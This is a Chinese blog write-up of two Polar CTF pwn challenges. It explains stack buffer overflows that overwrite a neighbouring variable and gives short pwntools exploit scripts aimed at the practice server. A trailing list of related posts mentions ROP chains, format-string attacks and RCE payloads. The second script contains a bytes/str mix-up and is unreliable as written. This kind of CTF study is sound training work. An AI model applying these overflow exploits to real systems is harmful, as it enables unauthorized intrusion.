Polar PWN内容WP 四

利用缓冲区溢出攻破CTF挑战
最新推荐文章于 2025-06-02 21:06:05 发布
原创 最新推荐文章于 2025-06-02 21:06:05 发布 · 837 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #安全性测试 #linux #系统安全 #网络安全

没人能拒绝猫猫

先去下载文件,然后导入到虚拟机中file和checksec一下

可以看到是64位程序,并且同时开启了金丝雀和NX保护

我们将程序放进IDA中查看一下源码

有一个很明显的后门函数,但是需要一些条件

在我们运行程序的时候会问我们是不是喜欢小猫,此时有两个选项其实不管输入哪个都无法触发后门函数,因为输入的内容是在buf变量中,而参与判断的是s2变量。

我们发现buf变量定义是32个而read可输入的是40个,所以这里有溢出点

buf到s2的距离是0x50-0x30

思路如下:通过溢出buf到s2,再将需要的内容lovecat写入到s2中即可

脚本如下:

from pwn import *
r = remote('120.46.59.242',2106)
elf = ELF('/home/ctfshow/Desktop/cat' )

payload = b'a'*(0x50-0x30)+b'lovecat\x00'
r.sendline(payload)
r.interactive()

打通后即可

what's your name

本关的整体解题思路与前一关一样

32位程序,未开启任何保护

ida查看一下

看不到在哪定义的?不要紧双击进去看一下;

以下思路纯属个人理解:

变量b在0804a06c的位置,变量c在0804a070的位置,所以我们只需要溢出b来到c再将需要的内容写入到c中即可

二者的偏移量为:70-6C

开始编写脚本

from pwn import *
r = remote('120.46.59.242',2052)
elf = ELF('/home/ctfshow/Desktop/pwn2' )

padding = 0x70-0x6c
payload = b'a' * padding + 'tznb\x00'
r.sendline(payload)
r.interactive()

打通后即可

由于本次内容是在上课时做的,所以无法做到很详细,并且内容也会较少

【Web】记录Polar靶场<简单>难度题一遍过(全)
m0_74824802的博客
12-25 1363
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
Polar PWN内容WP
pythonZLX的博客
03-19 2058
老规矩查看一下文件64位开启nx保护进入ida查看一下有两个函数,一个叫dalao,一个叫caiji输入1进入大佬函数,输入2进入菜鸡函数,先进去大佬函数看一下淦,被骂了;进入菜鸡函数看一下一个溢出漏洞,shift+F12查找字符串有bin/sh跟踪一下发现一个标准的后门函数思路:输入2进入菜鸡函数,然后利用溢出跳到后门函数位置编写然后cat flag即可。
polar靶场通关笔记
weixin_43296565的博客
06-06 8150
这里是关于自己打polar靶场的小笔记
PolarD&N靶场题解
qq_43423311的博客
03-23 3181
PolarD&N CTF靶场。
PolarCTF】 PWN_test_format
2301_76148382的博客
10-12 320
4.根据所得到的结果从前往后数,到Canary是第7位,考虑到还需要输入格式化字符串来泄露Canary,所以可以得到Cannary的偏移为6​​。因此可通过%6$n​​来修改n​​的值,将变量n​​的值修改为int​​字节数,即满足n​​的值为数值4​​,进而拿到权限。需要去调试到Canary位置的偏移量,通过格式化字符串漏洞修改n​的值为​4​。如果变量​n​和数值​4​相等,则程序调用​Shell()​函数。3.x/16wx $esp:以16进制查看​esp​处的参数。
Polar PWN内容WP
pythonZLX的博客
03-18 2344
下载文件放入虚拟机中查看一下32位ELF文件,开启栈不可执行保护(NX)放入IDA中看一下映入眼帘的就是一个flag函数,直接看一下flag函数中的内容好嘛!cat flag 思路明确了接着我们进入main函数中出现的yes函数,查看一下yes函数中的内容一个栈溢出,read写入的是100个字节,远远超出定义的58字节利用溢出,返回cat flag思路有了计算偏移地址偏移地址:0x58+4找出flag函数地址差不多了,开搞!​运行脚本后得到flag。
polarctf靶场【web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload
m0_73981089的博客
04-26 3046
session文件包含、文件包含、XXF伪造、rce、UA的修改、文件上传漏洞、爆破
Polar靶场reverse方向通关题解
ZJPC007的博客
12-04 2891
选中00411AC5处按C键MakeCode,再将00411AC4处的字节内容改为0x90。参考了其他师傅的题解,正常反编译出来就是前一个字符串按位-1和数字字符串进行异或。IDA打开后通过内存可以大概做出题目,但按照题目的本意应该是要进行花指令去除的。但00411AC4为花指令,后面的内容无法被正常识别和解析,导致反编译失败。具体的操作方法是:选中内存地址00411AC4,按U键进行undefine。base64解密,再对解密得到的内容进行md5加密。对账号的前七位-1,密码的位-2。
PolarCTF 靶场PWN(一)
2402_88025561的博客
04-01 505
read能输入40个字节 buf只有32个存在溢出 然后我们计算buf到s2的距离 (0x50-0x30)覆盖到这里之后 在输入lovecat\x00。打开ida发现了box函数,分析之后发现不能输入cat flag,但是还要对buf进行赋值。照例checksec查一下发现是64位然后开启了NX保护。照例查看 在ida里发现有输入可以造成溢出。找漏洞没找到到这里就很懵了,不知道怎么做了。学习一下别的师傅的思路发现直接输入$0就行。这就典型的后门函数了,直接写exp。然后我们就可以写exp了。
PolarD&N-CTF-web方向-困难_polard&n 没人能拒绝猫猫 ctf
2401_83620959的博客
04-03 872
那么我们就直接开始构造。在写本题时我学会了使用一个类时,调用类中不存在的变量以达到实现get()的调用。比如说:让file[‘filename’]=new FileRobot()这样就可以实现get的调用了。这里可以使用url编码,因为中间有一个private的属性。或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是…/flag.php就可以了。所以最终的payload:?i:110;
polarctf靶场【web】login、被黑掉的站、GET-POST、网站被黑、robots
m0_73981089的博客
04-26 1924
sal查询,bp爆破,目录扫描,get-post简单传参
Polar D&N Misc 大礼包 题解
qq_43123822的博客
10-15 788
1.根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”。5.用key=2的栅栏密码解密后发现格式正确了,但是具体的字符不对,那就考虑一下凯撒密码。Polar D&N靶场,CTF题目多样,题目完全原创,不定期开展各种赛事,欢迎各位来刷题!4.再拿base64进行解码,能看出和正常flag格式不同,那就再拿栅栏密码解密。6. 当key=13时,能发现所有的条件都满足了,直接提交flag,然后就C了!打开该图片,在文件末尾可看到一串base32编码。
Polar靶场 PHP是世界上最好的语言_polar靶场 苦海(2),2024年网络安全开发突破20k有哪些有效的路径
m0_60567796的博客
04-18 781
直接出结果,可我认为这个做法存在一定的运气,因为正则里面过滤了 ’ 和 " ,这就导致system(‘cat f*’)无法执行,因此我想到了用无参rce。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。接下来就是绕过if(isset($_POST[‘504_SYS.COM’])),这里要注意的是PHP里的非法传参。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!,大家跟着这个大的方向学习准没问题。
Polar靶场做题 —— test_format
2301_76262491的博客
10-12 791
PolarD&N_pwn_test_format
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 3624
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" } ​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
Polar靶场 PHP是世界上最好的语言_polar靶场 苦海(1),最终入职阿里
m0_60567796的博客
04-18 703
直接出结果,可我认为这个做法存在一定的运气,因为正则里面过滤了 ’ 和 " ,这就导致system(‘cat f*’)无法执行,因此我想到了用无参rce。pos(array_reverse(getallheaders()))是输出数组第一个键的键值,即39.188.154.214。接下来就是绕过if(isset($_POST[‘504_SYS.COM’])),这里要注意的是PHP里的非法传参。这里我是利用sys=eval(pos(array_reverse(getallheaders())));
polar ctf靶场web之seek flag
最新发布
2301_82086776的博客
06-02 502
发现存在robots.txt文件。发现存在部分flag值。
[DS]Polar靶场web(一)
m0_74057302的博客
03-24 786
静以养心,宽以养气。
polar ctf pwn
03-02
### Polar CTF Pwn 类别解题思路与漏洞利用技巧 #### 深入理解Pwn题目特点 在处理像PolarCTF这样的竞赛中的Pwn题目时,重要的是认识到这些挑战通常涉及内存安全问题,尤其是栈溢出和格式化字符串漏洞。如果学到的知识不成体系,遇到问题时只是浅尝辄止,则难以实现真正意义上的技术提升[^1]。 #### 构建有效载荷(Payload) 对于特定情况下使用`gets()`函数的情况,该函数会跳过前个字节来定位参数位置。因此,在构建用于攻击的有效载荷时,需要精心设计填充字节数量以及目标地址的放置顺序。例如: ```python payload = b'a' * 0x6c + b'b' * 4 + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) ``` 这段代码展示了如何通过控制返回地址指向`gets()`函数并最终调用系统命令的方式来进行漏洞利用[^2]。 #### 利用ROP链绕过保护机制 为了克服现代操作系统引入的各种防护措施(如NX位、ASLR等),可以采用基于返回导向编程(ROP)的技术。这涉及到查找二进制文件中存在的有用的小工具(gadgets),并通过组合它们形成所需的指令序列。此过程可以通过运行以下命令自动化完成: ```bash ROPgadget --binary filename --only "pop|ret" ``` 上述命令帮助识别可用于构造ROP链条的关键片段[^3]。 #### 处理不同架构下的差异 当面对不同的CPU架构时,需要注意其特有的细节。比如,在x86_64平台上执行读操作时,第一个参数通常是文件描述符编号(例如标准输入为0),第二个是指向缓冲区的指针,而第三个则是指定要传输的最大字节数目(如512字节对应于十六进制值`0x200uLL`)[^4]。 #### 实际案例分析:Easy_ShellCode 题目解析 考虑一个简单的例子,其中程序分配了一个大小为104个字符的空间给局部变量buf[],但在之后的操作中却尝试从中读取多达256个字符的内容。这种行为显然超出了最初预留区域的边界,从而导致潜在的安全风险——即所谓的“栈溢出”。此类错误可能被恶意用户用来改变程序流或注入任意代码[^5]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值